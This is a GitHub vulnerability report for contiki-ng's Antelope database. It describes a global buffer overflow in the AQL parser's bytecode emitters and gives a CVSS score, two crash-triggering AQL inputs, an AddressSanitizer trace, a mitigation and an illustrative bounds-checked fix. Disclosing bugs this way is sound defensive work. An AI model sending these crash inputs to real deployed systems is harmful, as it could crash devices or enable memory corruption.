
Global buffer overflow while parsing AQL (lvm_set_op, lvm_set_relation, lvm_set_operand) #596

Closed
cve-reporting opened this issue Jul 9, 2018 · 0 comments

Comments

@cve-reporting

The functions lvm_set_op, lvm_set_relation and lvm_set_operand memcpy input data (part of AQL files) into the fixed-size buffer lvm_instance_t->vmcode.
The allocated buffer can fit only DB_VM_BYTECODE_SIZE (128) bytes, and the check is missing.

Declaration:

db-options.h:110:
#define DB_VM_BYTECODE_SIZE 128

aql-parser.c:108:
static unsigned char vmcode[DB_VM_BYTECODE_SIZE];

This could potentially lead to Remote Code Execution, but the attack is more difficult because the buffer is stored in the global data segment and is filled with bytecode, not directly with user-provided data (Attack Complexity: High).
The risk of this issue is reduced (Attack Vector: Local) because the attacker would need to run a malicious AQL query; however, this is quite possible when the database is used in an IoT application.

Proposed CVSS score:
CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H (8.1 - high)

The following AQL code samples will trigger the crash:
(crash_003.sql):
REMOVE FROM aaa WHERE a - ( 000000000 / COUNT a - INLINE a - TYPE 000000000 / / a / < a - - a - TYPE 000000000 / TYPE 000000000 / / a / < a - MIN a - TYPE a - / a / < a - - a / / a / < a - - a - TYPE 000000000 - <- 000000000 / a / / 000000000 / / a / < a - - a aaa aaa 000000000 / - a SUM - ( FROM . ( a INTO ( aaa INTO , aaa STRING # aaa STRING (;

(crash_004.sql):
SELECT aaa FROM a WHERE aaa <= a / COUNT a - - a - TYPE 000000000 * / a / < a - - a - TYPE 000000000 / a / < a - - a - TYPE 000000000 / a / / a - TYPE 000000000 / RELATION a / < a - - a - TYPE 000000000 / / a / < a - - a - <- 000000000 / < a / COUNT a - - a - TYPE 000000000 * / a / < a - - a - TYPE 000000000 / a / < a - - a - aaa INTO / a / / a - TYPE 000000000 / / a / < a - - a - TYPE 000000000 PROJECT / a / < a + - a - <- 000000000 / a / / 000000000 / a - - a - TYPE 000000000 / a / / 000000000 / a - - a - TYPE 000000000 / / a / < a * a IN STRING a (

Mitigation:

The size of the input string should be limited to DB_VM_BYTECODE_SIZE.

Please take a look at the patch fixing this issue in TizenRT (which uses the antelope engine as arastorage):
Samsung/TizenRT@e024d3c

Crash details using Address Sanitizer:

=================================================================
==11197==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000061c080 at pc 0x000000411d94 bp 0x7ffc13e01600 sp 0x7ffc13e015f0
WRITE of size 4 at 0x00000061c080 thread T0
#0 0x411d93 in lvm_set_type contiki-ng/os/storage/antelope/lvm.c:375
#1 0x411d93 in lvm_set_operand contiki-ng/os/storage/antelope/lvm.c:425
#2 0x411d93 in lvm_set_variable contiki-ng/os/storage/antelope/lvm.c:486
#3 0x40308d in parse_operand contiki-ng/os/storage/antelope/aql-parser.c:273
#4 0x40308d in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:306
#5 0x403367 in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:321
#6 0x403367 in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:321
#7 0x403367 in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:321
#8 0x403367 in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:321
#9 0x403367 in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:321
#10 0x403367 in parse_expr contiki-ng/os/storage/antelope/aql-parser.c:321
#11 0x406853 in parse_comparison contiki-ng/os/storage/antelope/aql-parser.c:358
#12 0x406853 in parse_where contiki-ng/os/storage/antelope/aql-parser.c:408
#13 0x406853 in parse_remove_from contiki-ng/os/storage/antelope/aql-parser.c:568
#14 0x406853 in parse_remove contiki-ng/os/storage/antelope/aql-parser.c:611
#15 0x406853 in aql_parse contiki-ng/os/storage/antelope/aql-parser.c:832
#16 0x4019c1 in main contiki-ng/os/storage/antelope/test_aql.c:218
#17 0x7f7092fe282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#18 0x401c38 in _start (contiki-ng/os/storage/antelope/test_aql_asan.exe+0x401c38)

0x00000061c080 is located 32 bytes to the left of global variable 'p' defined in 'aql-parser.c:107:23' (0x61c0a0) of size 24
0x00000061c080 is located 0 bytes to the right of global variable 'vmcode' defined in 'aql-parser.c:108:22' (0x61c000) of size 128
SUMMARY: AddressSanitizer: global-buffer-overflow contiki-ng/os/storage/antelope/lvm.c:375 lvm_set_type
==11197==ABORTING
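The following is an added illustration, not code from the issue or from antelope: a simplified model of the lvm_set_* emitters appending bytecode into a DB_VM_BYTECODE_SIZE buffer, with the bounds check the report says is missing. The struct layout, `lvm_emit` helper and the 1-byte operator / 4-byte operand encoding are assumptions for the example; a query like crash_003.sql would behave like the long constructed expression compiled here.

```c
/* Hypothetical model of the antelope bytecode buffer: vmcode is a fixed
 * DB_VM_BYTECODE_SIZE array that the lvm_set_* functions append to.
 * Names below mirror the issue but the layout/signatures are assumed. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define DB_VM_BYTECODE_SIZE 128

typedef enum { LVM_OK = 0, LVM_ERR_NO_SPACE = -1 } lvm_status_t;

typedef struct {
  unsigned char *code;   /* backing store, the parser's global vmcode[] */
  size_t size;           /* capacity: DB_VM_BYTECODE_SIZE */
  size_t end;            /* bytes emitted so far */
} lvm_instance_t;

/* Hardened append: the unchecked version was a bare memcpy to code + end,
 * which is the global-buffer-overflow ASan reports above. */
static lvm_status_t lvm_emit(lvm_instance_t *p, const void *data, size_t len)
{
  if (p->end > p->size || len > p->size - p->end) {
    return LVM_ERR_NO_SPACE;          /* caller must reject the query */
  }
  memcpy(p->code + p->end, data, len);
  p->end += len;
  return LVM_OK;
}

/* Assumed encoding: operator = 1 byte, operand = 4-byte value. */
static lvm_status_t lvm_set_op(lvm_instance_t *p, unsigned char op)
{ return lvm_emit(p, &op, 1); }

static lvm_status_t lvm_set_operand(lvm_instance_t *p, int32_t value)
{ return lvm_emit(p, &value, sizeof value); }

/* Compile n constructed "- <operand>" terms (5 bytes each) and return how
 * many complete terms fit before the bounded emitter refuses more.
 * 128 / 5 = 25 terms fit; the 26th operand would overflow and is rejected. */
int compile_terms(size_t n)
{
  static unsigned char vmcode[DB_VM_BYTECODE_SIZE];
  lvm_instance_t vm = { vmcode, sizeof vmcode, 0 };
  for (size_t i = 0; i < n; i++) {
    if (lvm_set_op(&vm, '-') != LVM_OK ||
        lvm_set_operand(&vm, (int32_t)i) != LVM_OK)
      return (int)i;                  /* parser aborts with an error here */
  }
  return (int)n;
}
```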

@nfi nfi closed this as completed in #624 Aug 28, 2018
@simonduq simonduq added bug/vulnerability bug Label used for all issues that report a bug labels Oct 15, 2018